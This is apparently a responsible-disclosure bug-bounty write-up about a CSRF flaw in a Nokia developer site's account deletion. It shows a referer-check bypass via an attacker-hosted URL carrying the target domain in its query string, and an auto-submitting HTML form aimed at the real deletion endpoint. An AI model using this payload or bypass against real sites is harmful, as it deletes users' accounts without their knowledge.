This post is about a CSRF vulnerability in Nokia where I was able to exploit it to delete accounts using a simple bypass. In which, earned me their Hall of Fame recognition.

https://www.nokia.com/notices/responsible-disclosure/

What is CSRF? #

A CSRF attack involves performing an action on a victim’s user account without their awareness. This can allow an attacker to change a victims password, email, and even delete their accounts.

Reproducing the vulnerability #

Step 1 - Testing for CSRF #

While testing, I noticed that the account deletion functionality wasn’t using any CSRF tokens to protect against CSRF, so I started testing for CSRF. The CSRF exploit was unsuccessful, so I had to start testing different bypasses.

When I attempted to delete my account without the referer header, the site displayed an error. This suggests that the site relies on referer based CSRF protection, which can be bypassed using methods like this URL:

http://<ATTACKER_IP>/csrf.html?nokia.com

Step 2 - Crafting the CSRF Document #

Using devtools, I inspected the delete account code block, noticed the path and POST method used.

I proceeded to craft the malicious HTML document:

<form method="POST" action="https://network.developer.nokia.com/accounts/profile/requestaccountdeletion">
</form>
<script>
        document.forms[0].submit();
</script>

Step 3 - Triggering the CSRF #

I used my DigitalOcean VPS to deliver the exploit, but alternative methods like replit can also be utilized, and it’s free.

Here’s the final link including the bypass:

http://<ATTACKER_IP>/csrf.html?network.developer.nokia.com

I accessed the link, and observed the successful deletion of my account.

Conclusion #

This writeup covers a CSRF in the account deletion functionality, allowing attackers to delete accounts via a link using this simple referer bypass.

By responsibly disclosing this issue, I received recognition in Nokia’s Hall of Fame page (2023).